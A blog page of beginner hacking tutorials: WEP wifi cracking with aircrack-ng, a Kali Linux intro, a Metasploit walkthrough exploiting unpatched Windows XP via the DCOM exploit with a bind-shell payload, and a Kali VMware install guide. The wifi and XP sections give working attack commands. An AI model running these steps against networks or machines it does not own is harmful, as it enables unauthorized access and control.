PakTricks

Friday, 22 December 2017

// // Leave a Comment

Wifi Hacking - WEP - Kali Linux Aircrack-ng suite

Wifi Hacking - WEP - Kali Linux Aircrack-ng suite

Alright, this post is written assuming you have Kali Linux up and running on your computer. If not, here is a post on hacking with kali linux. It will tell you about what Kali Linux is, and how to use it. It will guide you through installation process.
So if you are still following, then just follow these simple steps-

Firstly, create a wireless network to crack. Don't use this method on others. It is illegal. Then proceed with the steps below.


1. Find out the name of your wireless adapter.


Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-

  • lo - loopback. Not important currently.
  • eth - ethernet
  • wlan - This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

Linux
Kali Linux



2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type 
airmon-ng start wlan0
 Your monitoring interface will be created - mon0 in case of Kali 1.x, wlan0mon in all other cases. 



3. Start capturing packets

Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack. For kali 2.0 or rolling, replace mon0 with wlan0mon
airodump-ng mon0


4. Store the captured packets in a file 

This can be achieved by giving some more parameters with the airodump command. For Kali 2.0 or rolling, replace mon0 with wlan0mon.
airodump-ng mon0 --write name_of_file

Now the captured packets will be stored in name_of_file.cap

You will have to wait till you have enough data (10000 minimum)
PS: Don't wait too long for this step though. Just understand how the procedure works (including the next sections), and once you are convinced you know what you are doing, proceed to the next tutorial where we use ARP replay to speed up the rate at which we gets packets. Using ARP request replay, we can get 10k packets in a few minutes.



5. Crack the wifi

If all goes well ,then you'll be sitting in front of your pc, grinning, finally you've got 10000 packets (don't stop the packet capture yet). Now, you can use aircrack-ng to crack the password. (in a new terminal)
aircrack-ng name_of_file-01.cap 
The program will ask which wifi to crack, if there are multiple available. Choose the wifi. It'll do its job. If the password is weak enough, then you'll get it in front of you. If not, the program will tell you to get more packets. The program will retry again when there are 15000 packets, and so on.

You'll get the key, probably in this format-
xx:xx:xx:xx:xx
Remove the colons
xxxxxxxxxx is the password of the wireless network

Issues?

Try this-
ifconfig wlan0 up
ifconfig wlan0 down
airmon-ng check kill
rfkill unblock all
Or this- (from Sebastian's comment below)

With the new version, the monitor is wlan0mon, and the monitor isn't working.
A solution is the commands:
ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up

Source: http://stackoverflow.com/questions/32025472/airodump-ng-wlan0mon-doesnt-work

Disconnected from internet (wifi)?

Again, replace mon0 with wlan0mon for Kali 2.0 or rolling.
airmon-ng stop mon0
This is usually sufficient. If wlan0 is not up (check ifconfig or iwconfig), then do this (if you don't know what to do, then do this anyway)-
ifconfig wlan0 up
 If wifi still doesn't start, try this too
service network-manager restart

Want to try an easier method?

Use wifite, just one command required

For WPA/WPA-2

Hacking wpa/wpa-2 wps with reaver on kali linux

For Troubleshooting

The missing ingredient

This attack taking too long? Ready to go further?

Speed up WEP hacking with ARP replay attack

WPA hacking sucks? There's an alternate way to go about it

Hacking WPA/WPA-2 without dictionary/bruteforce : Fluxion

Read More
// // Leave a Comment

Hacking With Kali Linux

Tutorial on Hacking With Kali Linux


Hacking With Kali Linux


Why Kali Linux?

With Kali Linux, hacking becomes much easier since you have all the tools (more than 300 pre-installed tools) you are probably ever gonna need. Others can be downloaded easily. Now this tutorial will get you started and you'll be hacking with Kali Linux before you know it.





The problem with beginners

Now, I've been dealing with beginners since a long time (and myself was one for a long time too). What they want is magic. A tool which is easy to use, works on Windows, can be download by searching on Google and clicking on the first link we see, and will do all the hacking itself on the push of a button. Sadly, no such tool exists (lets be real, would you use Facebook if a tool existed which you could install on Windows, simply type the person's username/mobile number/email and then just like that get his/her Facebook password?). 

Hacking is an art, and it takes years of practice to master it. So how to get started? Having no idea about hacking is okay, but being a newbie with computers in general is not allowed. When I say beginner, I mean someone who has no experience with programming and with hacking methodologies. I didn't mean someone who needs a 1 page guide on how to download a tool. If you want to be a hacker, you have to work hard. So how to get started? If you have installed Kali Linux, 



Getting Started

Now, I am not boring you with theory (^ As if all this wasn't enough theory). My aim is to get you to the point where you can start hacking with Kali Linux as soon as possible. What I'm gonna do is tell you what to do. The process is rather simple :-







Things get tough now

If you have no previous experience with Linux and virtual machines and all that stuff, getting Kali Linux up and running won't be a piece of cake.You have 2 options 3 options :


1. Read the Kali official documentation

That will give you an idea about what is a virtual machine, how OS can be run from USB, and how to create a partition and run 2 OS simultaneously. This is what I recommend. For that, go to Kali Official Documentation .

2. Read my modified version of Kali documentation

The second option is to look at these posts, which are just sparingly modified (and now outdated) versions of the Kali docs, and offer no advantage other than saving your time as their documentations cover much more than what the ones here do, and you don't really need to know all so much... yet. I'm linking them up here:

3. Utilize the zillions of tutorials on YouTube(New option)

The time this guide was written (for the first time in 2013, then updated in 2014), Kali wasn't so popular. However, now there are plenty of websites dedicated to Kali Linux, and a lot of YouTube videos on how to install Kali. My installation guides are outdated (mine are for Kali 1.0, now even Kali 2.0 is outdated and Kali rolling is what most of you should be using). While you can use an old installation guide and make a few changes and have it work for you, it's better, especially if it's your first time installing an operating system alongside another, that you follow a guide tailored for your situation (eg. if you are installing Kali rolling on Windows 10 on virtualbox, then follow guide for the exact same configuration, and not for Kali 2.0 on Windows 8 on Vmware).
Installing an OS is serious business, don't take it lightly, and don't get discouraged if you fail at first. Also, backup your data if you're going for a dual boot.


Command Line Interface

Some bash commands
Now, if you are really sure about becoming a hacker, you have to get used to linux, and specifically the command line interface. It is often compared to (and rightly so) to command prompt of Windows, but Linux' cli is much efficient and better than command prompt. What you have to do is do all the usual tasks you do in Windows in cli of Linux. Use cd to navigate, poweroff to shutdown, etc.
A pretty awesome site for that is - http://linuxcommand.org/
Going through the complete site is on its own enough exercise to keep you occupied for a month, but you can proceed gradually. The first few tutorials here will keep in mind that you don't have much info about cli, and will be really beginner friendly.



    Some Useful Commands:

    If you don't plan on learning all of linux cli commands, here are a few that will keep your boat afloat.
    1. The default username and password is 'root' and 'toor'. 
    2. Type 'poweroff' in the terminal to shutdown. 
    3. apt-get command can be used to install tools and updates. 
    4. apt-get update and apt-get upgrade will update all the programs installed on your machine. 
    5. apt-get dist-upgrade will install the latest distribution of Kali(i.e. it upgrades your OS).

    PS : Tapping <tab> while typing makes Kali complete the word for you . Double tapping <tab> makes it display all possible words starting with the incomplete word. Ctrl+c stops the functioning of any tool that is running. Pressing the up arrow key shows the command you last typed.


    Some Real Hacking With Kali Linux

    Assuming you've gone through the above steps and are comfortable with your new hacking environment, its time to do some real hacking with Kali Linux. My recommendation would be to start by hacking a wifi, then do some penetration testing, and maybe read something on Denial of Service when you have free time. Links here-

    Hack wireless networks in Kali Linux using aircrack

    Penetration Testing In Kali For Beginners

    Denial Of Service Attacks

    Read More
    // // Leave a Comment

    Penetration Testing - Hacking XP

    Penetration Testing - Hacking XP

    Our approach to penetration testing is going to be simple. I already made a post about the ideal way to begin penetration testing. But we aren't going to ideal way. I'm gonna teach you penetration testing the way I learnt it. By doing actual penetration and exploitation. We can't hack completely patched Windows 7 or Windows 8 right in the first tutorial, but we can definitely hack an unpatched Windows XP machine. However, to do that, you need to victim machine. Testing this method on someone else's computer is not recommended and is quite illegal. It is strongly advised to create your own virtual machine and test exploits there.

    What are you going to need

    Knowledge

    • Basic Penetration testing terms (I recommend that you take a look here, as I'm going to use the terms freely without any explanation here in this tutorial)
    • The tough manual way of penetration testing (A large patch of advanced material which will help you become a great pentester if you have the patience to read it all and capability to understand it)
    • VMWare tools (Without Vmware tools there is no way you can have a Kali linux (attacker machine) and unpatched XP (target machine) running at the same time in one single computer)

    Virtual Machines

    • Kali linux ( Click the link for a complete detailed guide)
    • Windows XP (After you've followed the tutorial above for installing Kali linux, installing XP on a VM will be a piece of cake, a few screenshots of the process)



    Now there is catch in Windows XP. While Kali linux is free, Windows XP is not. So you have to buy one (won't promote piracy here). Just make sure that when you are buying a Windows XP cd, it is unpatched and SP1. If it is patched then the exploits won't work. Your best bet would be to look up your shelves to find an old XP cd that you bought years ago which is catching dust, and put it to some use.

    A look at Metasploit Framework

    Starting the framework

    "In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." Simply speaking, there are some services that metasploit needs which aren't started with system startup. So here's some commands you need to execute on your console before you can start metasploit
    service postgresql start
    (Metasploit uses PostgreSQL as its database so it needs to be launched first.)

    With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.
    service metasploit start
    Update  : On recent versions of Kali, you can skip the above two commands, and start with the command below right away. If you are getting an error in above commands, then just skip them.

    Now finally we are ready to start metasploit framework.
    msfconsole

    Looking at the targets

    Right now, my metasploit framework is running on Kali on Vmware on a Windows 8 machine. Also, there is a Windows XP Sp3 virtual machine running side my side with my Kali. So what we need to do is detect these machines in Metasploit framework. For this we'll do a port scan.

    Port Scan

    Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan
    To use this feature, enter the following code-
    use auxiliary/scanner/portscan/tcp
    Type show options to see the available options
    show options
     Now we have to change a few settings, firstly, we should reduce the number of ports scanned
     set ports 1-500
    Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type
    ipconfig
    In the results, check the IP of the machine. This is what you'll have to specify the RHOSTS option as.
    In my case the IP is 192.168.63.131
    Now go back to your Kali machine, and type the fol (change the IP as required)
    set RHOST 192.168.63.131
    Here's what it should look like


    There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end.
    Now we are ready for some action, do a show options again to see what all changes you've made. Finally, type-
    run
    The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.
    If you had not been using an unpatched version of Windows, there will not be any vulnerable ports.
    This basically means that there are no open ports here. Nothing much you can do. However if you had some good luck there, and had a vulnerable machine, you will have some vulnerable ports. In my case, I turned off the firewall on the windows machine and run the auxiliary module again.
    I got 3 open ports this time. If you are using some higher XP version, you too might need to disable firewall in order to get open ports.
    Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445 open.


    Real life port scan

    In actual pentesting environment, you don't know about the IP, open ports and OS of the target computer. In such cases, we can use Nmap port scanner which is much better than auxiliary. We'll come to that later.

    Finding Exploits

    This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of auxiliary scanner. Search for dcom on msfconsole.
    search dcom
    This is a very famous exploit for Windows.
    Copy the exploit number 3. (Which shows great as rank). In the next line, type
    use exploit/windows/dcerpc/ms03_026_dcom
    You are now using the most famous Windows exploit. Type show options again
    show options
    Again, set the RHOST as 192.168.63.131 (replace with the IP of your target)
    set RHOST 192.168.63.131 
    Also, set a payload.
    set PAYLOAD windows/shell_bind_tcp

    And here's the best part
    exploit

    You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial.
    Update - The next tutorial is here. It discusses the post exploitation fun that you can have with the meterpreter payload.  Post exploitation fun in an exploited xp machine
    We have a pentesting lab now and have successfully exploited an XP machine.
    Read More
    // // Leave a Comment

    Complete Detailed Guide on Installing Kali linux in Vmware

    Complete Detailed Guide on Installing Kali linux in Vmware


    This tutorial will walk you through the difficult process of installing Kali Linux in VMware Player, a free virtual machine manager that can be downloaded from www.vmware.com. This tutorial assumes that you have some basic knowledge of your computer (amount of RAM number of processors, etc.) This tutorial is also intended for beginners who haven’t worked with VMware or Kali Linux before.





    Step One:

    First we need to download Kali from http://kali.org/downloads/.

    Step Two:
    Download via direct link or torrent.

    Step Three:
    When Kali has finished downloading, open VMware Player and click Create a new virtual machine.

    step 3 
    Step Four: 
    In the window that opens, select Installer disc image file (iso) and browse to the location of and select the Kali Linux ISO file that you just downloaded.

    step 4
    step 4.1
    Once you have selected the file, click Next.
    step 4.2
    Step Five:
    In the next step, select a name for the virtual machine. I’m going to name it Tutorial Kali for this tutorial. You also need to select a location for it, I recommend creating a folder called “Virtual machines” in My Documents. Then click Next.
    step 5
    Step Six:
    Next step, you need to select a maximum size for Kali. I recommend doing at least 30 GB’s as Kali tends to expand over time. After you’ve entered your desired value (no less than 20 GB) change the next option to Store virtual disk as a single file and click Next
    step 6
    Step Seven:
    In the next window, we need to customize some hardware settings, so click on the Customize Hardware… button.
    step 7
    Step Eight:
    You will now be presented with a Hardware window. In the left pane select Memory in the left pane of the window, and slide the slider on the right side to at least 512 MB*. This is for performance. Since I have 8 GB of RAM on my computer, I’m going to put it at 2 GB’s (2000 Mb’s).*Note, you should give a virtual machine a maximum of half the RAM installed on your computer. If your computer has 4 GB of RAM, then the max you want to slide it to is 2 GB. If your computer has 8 GB, then you can go to a max of 4 GB etc.. 
    step 8

    Now highlight Processors in the left pane. This option really depends on your computer, if you have multiple processors, then you can select two or more. If you have a regular computer, with two or less, then I suggest leaving this number at one.
    step 8.1

    Moving on, click on Network Adapter in the left pane. On the right side, move the dot to theBridged (top) option. Now click on the Configure Adapters button.
    8.2
    In the small window that pops up, uncheck all the boxes except for the one next to your regular network adapter and hit OK.
    8.4
    You can now click on Close at the bottom of the Hardware window and then click on Finishin the Wizard.
    step 8.5

    Step Nine
    After you click Finish the window will close and the new virtual machine file will be added to the VM library. Now all we have to do is start Kali and install it! To do this, highlight the name of the newly created virtual machine by clicking on it, and click Play virtual machine in the right pane.
    step 9
    This will start Kali for the first time.
    Step 10:
    At the boot menu, use the arrow keys to scroll down to Graphical install and hit enter.
    step 10
    Step 11:
    The next screen will ask you to select your preferred language, you can use the mouse to select this, then click Continue.
    step 11
    Step 12
    On the next screen, select your location and hit Continue.
    step 12
    It’ll now ask you for your standard keymap. If you use the standard American English keyboard, then just click Continue.
    step 13
    Step 14:
    Wait until Kali finishes detecting the hardware on your computer. During this, you might be presented with this screen:
    step 14
    Just hit Continue and select Do not configure the network at this time on the next screen.
    step 14.5
    Step 15:
    You will now be asked to supply a hostname, which is kind of like a computer name. You can enter anything you want, or you can just leave it as kali. When you’re done, hit Continue.
    step 15
    Step 16:
    Kali will now ask you to enter a password for the root (main) account. Make sure you can easily remember this password, if you forget it, you’ll have to reinstall Kali. Hit Continue after you’ve enter and re-entered the password of your choice.
    step 16
    Step 17:
    The next step will ask you for your time zone, select it and click Continue.
    step 17
    Step 18:
    Wait until Kali detects the disk partitions. When you are presented with the next step, selectGuided – use entire disk. (this is usually the top option) then click Continue.
    step 18
    The installer will now confirm that you want to use this partition. Hit Continue.
    step 18.5
    One more question about the partition will appear. Select the option that says All files in one partition and hit Continue.
    step 18.9
    Step 19:
    Confirm that you want to make these changes by selecting Finish partitioning and write changes to disk. Then hit Continue.
    step 19
    Step 20:
    The last question! Confirm that you really want to make these changes by moving the dot toYes and hitting Continue for the last time.
    step 20
    Kali will now start installing! Wait until it has completed, this might take upwards of 30 minutes.
    Step 21:
    Alright, Kali has finished installing and now you are presented with a window that asks you about a network mirror. You can just select No and hit Continue.
    step 21
    Step 22:
    After a few minutes, the installer will ask you if you want to install GRUB boot loader. Click Yesand Continue.
    step 22
    Step 23:
    The installation should now complete, and you’ll be shown with the following notification message:
    step 23
    Click Continue.
    Step 24:

    After it restarts, login to it with the user name root and the password that you created earlier. 
    Read More